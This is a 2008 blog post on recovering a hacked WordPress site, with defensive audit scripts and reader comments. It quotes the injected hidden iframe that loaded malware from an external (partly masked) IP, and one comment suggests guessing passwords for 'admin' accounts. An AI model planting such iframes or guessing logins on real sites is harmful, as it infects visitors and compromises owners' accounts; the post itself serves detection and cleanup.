WordPress Has Been Hacked: Are You Protected?

by TheWis April 24th, 2008 

Wordpress Hackers

For more than 7 years now, I've been working with websites based on popular applications such as WordPress, vBulletin and PHP-Nuke. When dealing with such popular applications, words like 'hacking' or 'security hole' become something that you get used to either dealing with or worrying about.

In the last 2 years, there have been some major developing concerns. Today, hackers are much more familiar with the importance of links and, since some may be SEOs, are using hacking as a link building strategy or as a negative link building tactic targeting the ranking of their competitors. Regardless of the intention of the hacker, your website's ranking may be damaged to some degree.

My story started a few days ago with Google showing this message alongside the search engine results for one of my personal websites: “This site may harm your computer.”

On the same day, I got an email from Google notifying me about this. To make sure you receive this notification, make sure you have access to the abuse@yourdomain.com mailbox.

The website in question is a relatively small one based on WordPress. This made me recall an incident from a month ago when a hacker uploaded more than ten pages to my site. Each page had more than 100 links pointing to many of the worst websites in the world, and all of them were uploaded to my WordPress upload directory, “/wp-content/uploads/”.

This directory is a fairly easy target as it has 777 permissions. I suspect the individual may be an SEO, as he knew that uploading these pages will mean nothing in this directory unless they have some inbound links so the search engine will know about them. As a result, the individual built tens of inbound links to these pages and got them indexed. I found out about these pages only after they were indexed and before having them removed.
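The check below is an added example, not part of the original post: it walks an uploads directory and reports world-writable directories (the effect of 777) and files with page or script extensions that a media folder should not contain. The extension list and the demo tree are assumptions constructed for illustration.

```python
import os
import stat
import tempfile

# Extensions that have no business in a media upload folder (assumed list).
SUSPECT_EXT = {".php", ".phtml", ".html", ".htm", ".js"}

def audit_uploads(root):
    """Return (world_writable_dirs, suspect_files) found under root."""
    writable, suspect = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        mode = stat.S_IMODE(os.stat(dirpath).st_mode)
        if mode & stat.S_IWOTH:  # "other" write bit, set by chmod 777
            writable.append((os.path.relpath(dirpath, root), oct(mode)))
        for name in filenames:
            if os.path.splitext(name)[1].lower() in SUSPECT_EXT:
                suspect.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(writable), sorted(suspect)

def build_demo_tree():
    """Constructed sample tree standing in for wp-content/uploads."""
    root = tempfile.mkdtemp(prefix="uploads-demo-")
    month = os.path.join(root, "2008", "03")
    os.makedirs(month)
    for name in ("photo.jpg", "spam-links.html", "logo.png"):
        with open(os.path.join(month, name), "w") as fh:
            fh.write("constructed sample\n")
    os.chmod(root, 0o777)                         # the risky setting described above
    os.chmod(os.path.join(root, "2008"), 0o755)   # tighter settings for comparison
    os.chmod(month, 0o755)
    return root

if __name__ == "__main__":
    dirs, files = audit_uploads(build_demo_tree())
    for rel, mode in dirs:
        print("world-writable:", rel, mode)
    for rel in files:
        print("unexpected file:", rel)
```

Pointing `audit_uploads` at a downloaded copy of the real uploads folder gives the same two lists for the live site.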

After reading the message from Google, I began to think that they had acted very late on this incident; as such, I didn’t make any changes on the site. The only thing I did was to download all of the site's files and scan them with spyware software; everything appeared clean.

Next I went through the files and didn’t find anything wrong, so I went to Google Webmaster Tools, where I found an alert about the problem taking up almost an entire page, with a link to review the website. Next I filed a revision request.

Two days later, I re-checked Google Webmaster Tools only to find a new Google response listing four pages (URLs) on my blog that had the offending code. After a quick review of the pages, I found a piece of code repeated on all of them that didn’t look clean, as it contained an iframe:

<!-- Traffic Statistics --> <iframe src=http://xx.xx.xxx.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

Lastly, I conducted some additional research and found out that the folks at the WordPress support forum were discussing the same problem; however, they were not sure which version of WordPress was affected. In my case, I believe it's WordPress 2.5 and/or maybe older versions. I then checked all WordPress files on my website and none of them has this code, so the code most likely was injected into the database using xmlrpc.php, which has the ability to import remote content to WordPress.

I removed the offending code, went back to Google Webmaster Tools, filed another revision request and got the message “This site may harm your computer.” removed. It took me 3 days to get rid of this message, while many people keep saying that it might take up to 15 days. The credit for this quick result should be given to the amazing team behind Google Webmaster Tools: the guys there respond to any revision request in less than 24 hours, and they really deal responsibly with webmasters encountering this message, as they know the damage it causes to any website.

Hopefully this doesn't happen to you; however, if it does, here is a list of checks to conduct:

How to diagnose if your blog has this problem:

1- If you feel your blog is taking more time than usual to load, or if you see a message in the status bar that says it is connecting to xx.xxx.x.157.
2- If you view the source code of any page in your blog and see the iframe code shown above.
3- If your blog's search engine results are marked “This site may harm your computer.”, or you get any message from Google in this regard.

How to fix this problem:

1- Upgrade your WordPress to the latest version, and keep doing that on a monthly basis. The folks there will figure out how to keep WordPress safe, so lean on them.
2- Upgrading WordPress will not remove the code. You need to go to the infected post, use the HTML edit button in WordPress and remove the code. Alternatively, if you have phpMyAdmin, choose your blog database, go to Search, enter any word from the code, such as “iframe”, select the table wp_posts and hit Go; you will see all the infected posts.

How to protect yourself in future:

1- As mentioned before, keep your WordPress updated to the latest version and make sure to stay updated with their announcements.
2- Every month, manually scan your WordPress files and see if you find any suspicious files.
3- Always check your web stats, especially the content section, and see if any pages are recording visits that you don’t know about.
4- Check the source code of your posts on a regular basis to make sure that it is clean of any malicious code.
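
The wp_posts search from the fix steps and the regular source check in item 4 can be automated. The following is an added example, not code from the original post: it parses exported post content and flags iframes that point off-site or are sized to be invisible, like the one quoted earlier. `SITE_HOST` and the sample rows are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
SITE_HOST = "blog.example"  # assumption: the blog's own hostname

class IframeFinder(HTMLParser):
    """Collect the attributes of every <iframe>; HTML comments are ignored."""
    def __init__(self):
        super().__init__()
        self.frames = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append({k: (v or "") for k, v in attrs})

def _tiny(value):
    """True for a 0 or 1 pixel dimension, the size used to hide a frame."""
    digits = value.strip().lower().replace("px", "")
    return digits.isdigit() and int(digits) <= 1

def suspicious_iframes(post_content):
    """Return (src, reasons) for each iframe that deserves a manual look."""
    finder = IframeFinder()
    finder.feed(post_content)
    findings = []
    for frame in finder.frames:
        reasons = []
        host = urlparse(frame.get("src", "")).hostname or ""
        if host and host != SITE_HOST:
            reasons.append("external host")
        if _tiny(frame.get("width", "")) or _tiny(frame.get("height", "")):
            reasons.append("hidden size")
        if "display:none" in frame.get("style", "").replace(" ", "").lower():
            reasons.append("hidden by style")
        if reasons:
            findings.append((frame.get("src", ""), reasons))
    return findings

def scan_posts(rows):
    """rows: (ID, post_content) pairs exported from the wp_posts table."""
    return {pid: hits for pid, body in rows if (hits := suspicious_iframes(body))}

# Constructed sample rows; 102 carries the iframe pattern quoted in the post.
SAMPLE_ROWS = [
    (101, "<p>Clean post.</p>"),
    (102, "<p>Hi</p><!-- Traffic Statistics --> <iframe src=http://xx.xx.xxx.157"
          "/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>"),
    (103, '<iframe src="http://blog.example/v" width="560" height="315"></iframe>'),
]
if __name__ == "__main__":
    print(scan_posts(SAMPLE_ROWS))
```

A legitimate embed from the blog's own host at normal size, as in row 103, is not reported, so the output stays short enough to review by hand.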

As blog strategy is getting more popular among SEO companies, the technical part of WordPress should be covered all the time by some technical people to save the good work of marketing people. :-)

21 Responses to “WordPress Has Been Hacked: Are You Protected?”

  1. Shana Albert says:

    Great post!!

    As I read this post I am still trying to fix my father's blog that got hacked yesterday… What a pain in the "you-know-what". I'm going to use your tips to fix and hopefully prevent this from ever happening again.

    Thank you.

    Shana

  2. dan says:

    This is exactly what happened to my site, down to the /iframe/ etc., embedded in two files in content. Agree on the xmlrpc.php file as well, as it has historically had issues.

  3. Roby says:

    Very good and helpful information. Thank you. I also seem to be getting an excessive amount of spam from online pharmaceutical offers which irritates the heck out of me. I did recently upgrade to the latest version of wordpress in hopes that this would go away however it still persists. My son is a blog/SEO guru so I will also pass this article on to him as well. Thanks for taking the time to post such an informative entry.

    Kind regards,
    Roby

  4. pKay says:

    I think this is geared towards wordpress.org and self-hosted domain websites, right? We at wordpress.com are safe? Kind of? Sort of? Maybe??

    Cheers!

  5. Very good Post. I agree with the online spam from pharmaceutical junk. I do not know what these folks are thinking with spamming everyone to death. Probably spam bots. I used to have some forums but deleted them because of the spam. Keep up the great writing very good stuff.

  6. [...] Search Engine people has a great article about the latest round of wordpress security breaches, and it sums up nicely what happened here over the last two weeks down to the attack profile, the malware link left behind, and the rest of it. If you want another analysis of the hack, then you want to go read this article. [...]

  7. [...] suffered twice) – here are two great articles on how to avoid being hacked and how to recover, from Search Engine People and Daily Blog [...]

  8. Do you just have to set up an abuse@domain.com and you will receive emails like this?

    Are there any other emails that should be set up?

  9. TheWis says:

    @Shana
    Please let me know if you need any help.
    @ Dan
    Sorry to hear that, just make sure you search your posts using the database to make sure that the offending code no longer exists.
    @ Roby
    Killing spam shouldn't be a problem, you can even ignore it without causing any damage to the blog.
    @ pKay
    Yes I am talking about self host here, in your case you don’t have access to upgrade the files so WordPress will take care of that for you, but I am not sure about the files structure in this case if it is the same, some checkup will help anyhow.
    @Pete
    Thanks, the good aspect of spamming is that it doesn’t have any direct damage to the blog like hacking
    @Make Money Blogging
    Actually for this domain I have the Catch All feature enabled so I got 5 emails from Google to different email accounts, but the only one stuck in my mind is abuse@yourdomain.com, I will check if I still have all of them and post them.

  10. The pages in the upload directory are being abused via blog and forum spam. We're getting tons of spam pointing to such pages.

  11. TheWis says:

    @Make Money Blogging
    Here is a list of the emails that will get a copy of Google's malware notification:
    abuse@domain.com, admin@domain.com, administrator@domain.com, contact@domain.com, info@domain.com, postmaster@domain.com, support@domain.com, webmaster@domain.com

    The message will start like this:

    Dear site owner or webmaster of domain.com,

    We recently discovered that some of your pages can cause users to be
    infected with malicious software. We have begun showing a warning page
    to users who visit these pages by clicking a search result on
    Google.com.
    Below is an example URL on your site which can cause users to be
    infected (space inserted to prevent accidental clicking in case your
    mail client auto-links URLs):

  12. [...] was talk about a WordPress security vulnerability over at Search Engine People, but I don't know if this is the same as the one that was fixed or [...]

  13. Very helpful – but I'd rather suggest to subscribe to the WordPress Development blog to get notifications for urgent security updates than update on a monthly schedule.

    A monthly schedule might leave your blog vulnerable for as much as 30 days if you happen to miss a fix by just one day. That's an eternity for a hacker to target your site.

  14. Marc says:

    one of my wordpress sites was hacked a month ago and they used it to send out spam for a few hours before i shut them out. my host thinks it was because i was still using a slightly old version of wordpress

    so we also have to be on the lookout for files installed which can send out email and can bypass the server's normal email protocols and safeguards

    im still a big supporter of wordpress though

  15. Utah SEO says:

    Man I hate those damn iFrame hacks.

  16. Matt Ridout says:

    Really informative post about wordpress – I will have to keep my eyes open!

  17. GhostHoster says:

    I think hacking wordpress is very easy compared to any other things !!!
    really ,
    Look
    most of the WordPress blogs have Admin as username and u just need to find the password.
    Just try few combinations with blog author name or blog name

    simple :)

  18. bonfide says:

    In the process of getting back up from a hack that inserted the code.. I'm re-installing a current version of WP and then reloading a copy of my database and tweaking it on an air gapped local box. Then it will go back up and I'll petition Google for a clean review.

    God help the hacker if I ever found him/her….

  19. [...] suffered twice) – here are two great articles on how to avoid being hacked and how to recover, from Search Engine People and Daily Blog [...]

  20. chineseguy says:

    suffered twice) – I believe wordpress is trying to fix the bugs and holes continuously, but still you have to be careful, change your passwords frequently, make it hard to guess, get a good hosting company, besides try to make backups frequently.

  21. James says:

    Nothing wordpress does can help you from being hacked, it's a sad truth but with each new release the hackers also have access to the new release and thus they still know what to do in order to hack your blog.

    Only way to protect yourself is to get WP Secured (see url) as it takes you step by step on what to do to change the functionality of your blog so the hackers can NOT hack your blog.

    WordPress.org will not do this for you, you must take action now and save yourself a lot of trouble in the future..

    James